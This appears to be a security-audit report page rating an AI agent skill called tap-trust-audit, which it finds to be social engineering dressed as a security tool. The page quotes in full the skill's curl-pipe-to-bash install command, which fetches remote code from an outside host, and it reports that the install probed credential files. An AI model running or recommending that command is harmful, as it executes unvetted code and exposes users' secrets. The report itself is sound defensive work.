Oathe Security Badge

Is skill/tap-trust-audit safe?

Use with caution. skill/tap-trust-audit is not clearly unsafe, but the audit flagged risks to review before you install it. Oathe's behavioral security audit gave the tap-trust-audit skill by skill a trust score of 53/100 with 5 findings (1 critical, 2 high). Report updated

https://clawhub.ai/skill/tap-trust-audit

53
CAUTION

Is skill/tap-trust-audit safe to install?

This skill presents a sophisticated social engineering attack disguised as a security tool. While the SKILL.md file itself contains no malicious code, its primary purpose is tricking users into executing dangerous curl|bash commands that download and run arbitrary code from external sources. The skill exploits security-themed branding to lower user defenses.

What security issues were found in skill/tap-trust-audit?

Category Scores

Prompt Injection 40/100 · 30%
Data Exfiltration 85/100 · 25%
Code Execution 10/100 · 20%
Clone Behavior 60/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 30/100 · 5%

Findings (5)

CRITICAL Promotes dangerous curl|bash installation -90

The skill's primary purpose is instructing users to execute remote scripts via 'curl -sSL https://trust-audit-framework.vercel.app/api/install | bash', which bypasses all security controls and allows arbitrary code execution from an external source.

HIGH Social engineering through security theater -60

The skill presents itself as a 'Trust Audit Protocol' and security system while actually promoting extremely insecure installation practices. This is a form of social engineering designed to lower user guard through security-themed branding.

HIGH Deceptive security positioning -70

A skill that brands itself around 'trust', 'security', and 'verification' while promoting curl|bash execution represents a sophisticated social engineering attack that exploits user trust in security-branded content.

MEDIUM External network connections during install -40

The installation process made connections to external hosts (216.150.1.1:443) and performed DNS queries, indicating the skill attempts to contact external services during installation.

MEDIUM Sensitive file access without exfiltration -15

During the audit, the system accessed sensitive files (.env, SSH keys, AWS credentials) but did not exfiltrate them. This suggests the skill installation process may probe for sensitive files.

Should I install skill/tap-trust-audit?

Oathe's verdict for skill/tap-trust-audit is CAUTION with a trust score of 53/100. Recommendation: Review before install.